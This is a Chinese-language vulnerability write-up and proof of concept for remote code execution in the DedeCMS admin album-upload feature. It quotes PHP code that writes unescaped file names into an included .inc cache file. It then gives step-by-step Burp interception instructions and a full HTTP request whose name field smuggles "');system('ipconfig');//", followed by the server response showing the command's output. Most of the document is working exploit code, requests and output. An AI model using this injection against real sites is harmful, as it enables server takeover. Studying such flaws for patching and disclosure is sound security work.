漏洞产生原因: 写入inc文件+文件包含导致任意代码执行
漏洞代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <?php
...
if ($albumUploadFiles !== '') {
$files = json_decode(stripslashes($albumUploadFiles), true);
foreach ($files as $file) {
$uploadTmp = DEDEDATA . '/uploadtmp';
$tmpFile = $uploadTmp . '/' . $file['name'];
$fileDir = $cfg_image_dir . '/' . MyDate($cfg_addon_savetype, time());
CreateDir($fileDir);
$filePath = $fileDir . '/' . $file['name'];
...
$fid = $dsql->GetLastID();
AddMyAddon($fid, $filePath);
function AddMyAddon($fid, $filename)
{
$cacheFile = DEDEDATA.'/cache/addon-'.session_id().'.inc';
if(!file_exists($cacheFile))
{ $fp = fopen($cacheFile, 'w');
fwrite($fp, '<'.'?php'."\r\n");
fwrite($fp, "\$myaddons = array();\r\n");
fwrite($fp, "\$maNum = 0;\r\n");
fclose($fp);
}
include($cacheFile);
$fp = fopen($cacheFile, 'a');
$arrPos = $maNum;
$maNum++;
fwrite($fp, "\$myaddons[\$maNum] = array('$fid', '$filename');\r\n");
fwrite($fp, "\$maNum = $maNum;\r\n");
fclose($fp);
}
|
利用过程
- 登录管理员后台,然后选择右上角“内容维护”,然后点击左边的“图片集”,最后点击中间的“添加文档”。如下图所示:
- 进入到“添加文档”之后,依次填写“图集标题”,选择“图集主栏目”,在手工上传处选择本地图片上传一张图片。
- 然后打开burpsuit开启监听,拦截住点击“确定”按钮的HTTP请求,然后修改图示位置的name参数的值为
');system('ipconfig');//,然后将该HTTP请求发送。 
- 可以看到成功执行ipconfig命令。
完整HTTP请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
| POST /dede/album_add.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 4121
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://dedecms-57105.localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoNBMhAWA73UNeUq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=693db57bf5d85c42; PHPSESSID=0kckthapkrjb7jlhg207ovnit2; _csrf_name_8fc2d915=ee428983820312df1afe447e487e3dbd; _csrf_name_8fc2d9151BH21ANI1AGD297L1FF21LN02BGE1DNG=e2a21dd6e71d551c; DedeLoginTime=1694173153; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=1971781375dd7f27; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="channelid"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="cid"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imagebody"
粘贴到这里...
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="maxwidth"
800
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="albumUploadFiles"
[{"name":"');system('ipconfig');//","remark":"something"}]
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="title"
rce
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="shorttitle"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="redirecturl"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="tags"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="weight"
108
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="picname"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid"
13
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid2"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dede_addonfields"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagestyle"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="row"
3
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="col"
4
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ddmaxwidth"
200
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagepicnum"
12
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="isrm"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="zipfile"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="delzip"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="copysource"
http://
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="body"
<p>123123</p>
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="source"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="writer"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="notpost"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="click"
199
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="sortup"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="color"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="arcrank"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ishtml"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pubdate"
2023-09-08 19:55:03
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="money"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="description"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="filename"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.x"
44
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.y"
17
------WebKitFormBoundaryfoNBMhAWA73UNeUq--
|
HTTP响应
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
| HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 08 Sep 2023 12:02:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.6.9
Content-Length: 4344
Windows IP ����
δ֪������ Appgate SDP:
�����ض��� DNS �� . . . . . . . :
IPv4 ��ַ . . . . . . . . . . . . : 192.168.9.86
�������� . . . . . . . . . . . . : 255.255.255.255
Ĭ������. . . . . . . . . . . . . :
��̫�������� ��̫��:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . : TBMDT.COM
��̫�������� ��̫�� 2:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
��̫�������� VirtualBox Host-Only Network:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::3e32:8785:dc70:871f%22
IPv4 ��ַ . . . . . . . . . . . . : 192.168.56.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
δ֪������ OpenVPN TAP-Windows6:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 1:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 10:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
��̫�������� VMware Network Adapter VMnet1:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::49f3:576f:5115:6188%8
IPv4 ��ַ . . . . . . . . . . . . : 192.168.65.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��̫�������� VMware Network Adapter VMnet8:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::3812:ae41:6c56:c806%11
IPv4 ��ַ . . . . . . . . . . . . : 192.168.40.1
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��̫�������� ������������:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>成功发布一个图集!</title>
<link rel="stylesheet" type="text/css" href="/plus/img/base.css">
</head>
<body background='/plus/img/allbg.gif' leftmargin="8" topmargin='8'>
<table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#DFF9AA">
<tr>
<td height="28" style="border:1px solid #DADADA" background='/plus/img/wbg.gif'>
<b>◇文章管理::发布图集</b>
</td>
</tr>
<tr>
<td width="100%" height="80" style="padding-top:5px" bgcolor='#ffffff'>
<table width='100%' border='0' cellpadding='3' cellspacing='1' bgcolor='#DADADA'>
<tr bgcolor='#DADADA'>
<td colspan='2' background='/plus/img/wbg.gif' height='26'><font color='#666600'><b>成功发布一个图集:</b></font></td>
</tr>
<tr bgcolor='#FFFFFF'>
<td colspan='2' height='100'> <div style="line-height:36px;height:36px">
请选择你的后续操作:
<a href='album_add.php?cid=13'><u>继续发布图片</u></a>
<a href='archives_do.php?aid=121&dopost=editArchives'><u>更改图集</u></a>
<a href='/a/tuji/2023/0908/121.html' target='_blank'><u>预览文档</u></a>
<a href='catalog_do.php?cid=13&dopost=listArchives'><u>已发布图片管理</u></a>
<a href='/dede/content_i_list.php?channelid=2'>[<u>记忆的列表页</u>]</a>
</div><table width='80%' style='border:1px dashed #cdcdcd;margin-left:20px;margin-bottom:15px' id='tgtable' align='left'><tr><td bgcolor='#EBF5C9'> <strong>正在进行相关内容更新,请完成前不要进行其它操作:</strong>
</td></tr>
<tr><td>
<iframe name='stafrm' frameborder='0' id='stafrm' width='100%' height='200px' src='task_do.php?typeid=13&aid=121&dopost=makeprenext&nextdo='></iframe>
</td></tr>
</table> </td>
</tr>
<tr><td bgcolor='#F5F5F5'> </td></tr></table>
</td>
</tr>
</table>
<p align="center">
<br>
<br>
</p>
</body>
</html>
|
